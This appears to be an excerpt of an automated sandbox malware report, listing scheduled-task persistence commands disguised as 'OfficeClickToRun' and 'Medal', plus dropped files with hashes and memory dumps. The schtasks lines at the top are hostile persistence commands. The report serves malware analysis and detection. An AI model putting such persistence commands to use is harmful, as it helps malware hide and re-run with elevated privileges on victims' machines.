                                                                                            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4724
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:664
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 10 /tr "'C:\Medal\Medal.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4772
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2560
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 7 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:880

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v15

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe
                                                                                            Filesize

                                                                                            206B

                                                                                            MD5

                                                                                            4f3f273179a1bd058ed059d322db85fc

                                                                                            SHA1

                                                                                            7eb81ffc4a93e30c4a2733d59acf7870df2103f6

                                                                                            SHA256

                                                                                            5b59e046d311d49f2f4ac613e394b0e3b4a925a6918ed8a9a9420929d2eed70d

                                                                                            SHA512

                                                                                            49a6fe66b7d9df496f57d5d2e66752141e5227072df13b3d3655be982e6a499607e276bf9f27bb16164309166f8116c0cd0481dcd5d8a05fb0ff1cde9c06299d

                                                                                            Download Submit

                                                                                          • C:\Medal\Medal.exe
                                                                                            Filesize

                                                                                            1.6MB

                                                                                            MD5

                                                                                            397270342ebff19bad2535390cff49c6

                                                                                            SHA1

                                                                                            482edca85dc4a788acfaf1d1155f95c0e4f5e1f1

                                                                                            SHA256

                                                                                            143e3baeafa9d95f8261d342a8d74fceb1006c92fdabb8642d730ede7429bdaa

                                                                                            SHA512

                                                                                            6492376f333de41d0d7e8a21d32f8d0a10d2f9827948a9fe4fe04ee5bd6b10d3a2bd984c74201c3bfc8bf41347aaf0dc4b2b86dbeff4bfa8e65f7a03e7c9a9ba

                                                                                            Download Submit

                                                                                          • C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat
                                                                                            Filesize

                                                                                            76B

                                                                                            MD5

                                                                                            913226ebe160f705613c1d6dc13763ca

                                                                                            SHA1

                                                                                            11519fe4f2769114270377bebe1d944073c68ae9

                                                                                            SHA256

                                                                                            9c8501b6c9e586b9791b7492697c2555a28fec65770e325890047d410fc84941

                                                                                            SHA512

                                                                                            8f45b29bde3794e02a263f07116260a588c478496c892ce4d12b7b8361ae6dac95a1ee0f0d7c7fb81ebdfb7c4d5123ccf18ef5ae9e150be04f65aa22a2d75e00

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Medal.exe.log
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            4ef3ab577fdbd5c7dd815e496ecd5601

                                                                                            SHA1

                                                                                            8dd86865a8e5f1c4c77a21cc2b26cc31e8330ad8

                                                                                            SHA256

                                                                                            72a639b0e0027ca8e0bb9d3cbd12b56797c431a9171acaea9217aff387961964

                                                                                            SHA512

                                                                                            ffe35302cf9922fb22d681c989162a46220b949b5dcaf076eadb1ced347ff0b7a77421ce6ee06514faf9c5364e2094f5a2ec239a537c28c88d32e21262501c9d

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                            Filesize

                                                                                            2KB

                                                                                            MD5

                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                            SHA1

                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                            SHA256

                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                            SHA512

                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            d28a889fd956d5cb3accfbaf1143eb6f

                                                                                            SHA1

                                                                                            157ba54b365341f8ff06707d996b3635da8446f7

                                                                                            SHA256

                                                                                            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                            SHA512

                                                                                            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            2e907f77659a6601fcc408274894da2e

                                                                                            SHA1

                                                                                            9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                                                            SHA256

                                                                                            385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                                                            SHA512

                                                                                            34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            59d97011e091004eaffb9816aa0b9abd

                                                                                            SHA1

                                                                                            1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                                                            SHA256

                                                                                            18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                                                                            SHA512

                                                                                            d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            cadef9abd087803c630df65264a6c81c

                                                                                            SHA1

                                                                                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                                                            SHA256

                                                                                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                                                            SHA512

                                                                                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\IJlv46yGfz.bat
                                                                                            Filesize

                                                                                            194B

                                                                                            MD5

                                                                                            17b210316d63a88fd4c09cc487183145

                                                                                            SHA1

                                                                                            a13712d32f5d0c9adfbbae2e686baaf684ef29c2

                                                                                            SHA256

                                                                                            8897b6033900d2718a866564c83c82112f506e67817f5a7c436581ff6ab2c590

                                                                                            SHA512

                                                                                            5e01e3b6fea113a5f1af568768d165d1320a1676036b55df4c394c0c1b11946d0c041b9d2f5156b9d806a984d348f05ee7bfdfa234925704258c4ebc8616a622

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdaqwyfs.ltr.ps1
                                                                                            Filesize

                                                                                            60B

                                                                                            MD5

                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                            SHA1

                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                            SHA256

                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                            SHA512

                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Roaming\gdi32.dll
                                                                                            Filesize

                                                                                            446KB

                                                                                            MD5

                                                                                            efd69d9f6037086f0b2e23417b7a1afa

                                                                                            SHA1

                                                                                            ac3c91b7bdcafad357ee578aa6fdbece22cd19ab

                                                                                            SHA256

                                                                                            27ef5c51d945dd64cd17718b01ce72fb352f9fc0a83f1adfd601d1e62b1469b0

                                                                                            SHA512

                                                                                            3bd6d0e1419286ce77c30a30f9e7df7114b5f6b81b75cd703e0293bb391ab7e573a807c267b461e7448a0e3744777b614bfa32b241cb4bc63fe44bf2173bf40f

                                                                                            Download Submit

                                                                                          • C:\Windows\Speech\physmeme.exe
                                                                                            Filesize

                                                                                            694KB

                                                                                            MD5

                                                                                            1dc5d763d93e66ff1775cfc9d749d82d

                                                                                            SHA1

                                                                                            76f7efc39d4ae890c9d2da577af942f959f0d03f

                                                                                            SHA256

                                                                                            1de1f60c6f5ea26d2f2ebf5447910f156db59d896bbe753c90aa828cd6ef06f1

                                                                                            SHA512

                                                                                            4108d78571bd6df8a4e66ae70e2546a0b2011a3224f29acde1739e5b4ea80fde7450d00759fd479e8cbef75e7d26a840635509bd709a2863c6346dfab3f8e050

                                                                                            Download Submit

                                                                                          • C:\Windows\Speech\physmeme.exe
                                                                                            Filesize

                                                                                            1.9MB

                                                                                            MD5

                                                                                            45d510cebcdf9aa852297a7303627ab1

                                                                                            SHA1

                                                                                            86605b896ec57d214d5839b2db897ae79be32778

                                                                                            SHA256

                                                                                            fc66c2a511a43c990ca2485814be308f2c65ef61d82124299036b3f8f694e5ee

                                                                                            SHA512

                                                                                            42ea67e8a6aaff3d1daec65f0b9c5e53952f55894fc0ce31259e61ad4ac277d3225d3b9ae142f78ae2d466387a0d92c5ba8059a0b2404d5a200aece40b9cea85

                                                                                            Download Submit

                                                                                          • memory/1692-16-0x0000000000790000-0x00000000007EA000-memory.dmp

                                                                                            Filesize

                                                                                            360KB

                                                                                            Download

                                                                                          • memory/1692-11-0x0000000000790000-0x00000000007EA000-memory.dmp

                                                                                            Filesize

                                                                                            360KB

                                                                                            Download

                                                                                          • memory/1692-12-0x0000000000790000-0x00000000007EA000-memory.dmp

                                                                                            Filesize

                                                                                            360KB

                                                                                            Download

                                                                                          • memory/2812-4-0x0000000002820000-0x0000000002826000-memory.dmp

                                                                                            Filesize

                                                                                            24KB

                                                                                            Download

                                                                                          • memory/2812-3-0x0000000000380000-0x0000000000436000-memory.dmp

                                                                                            Filesize

                                                                                            728KB

                                                                                            Download

                                                                                          • memory/3296-36-0x0000000002BD0000-0x0000000002BDC000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                            Download

                                                                                          • memory/3296-34-0x00000000013D0000-0x00000000013DE000-memory.dmp

                                                                                            Filesize

                                                                                            56KB

                                                                                            Download

                                                                                          • memory/3296-32-0x0000000000A40000-0x0000000000BEA000-memory.dmp

                                                                                            Filesize

                                                                                            1.7MB

                                                                                            Download

                                                                                          • memory/3512-126-0x000000001BDF0000-0x000000001BEF2000-memory.dmp

                                                                                            Filesize

                                                                                            1.0MB

                                                                                            Download

                                                                                          • memory/3588-62-0x000002AD57D80000-0x000002AD57DA2000-memory.dmp

                                                                                            Filesize

                                                                                            136KB

                                                                                            Download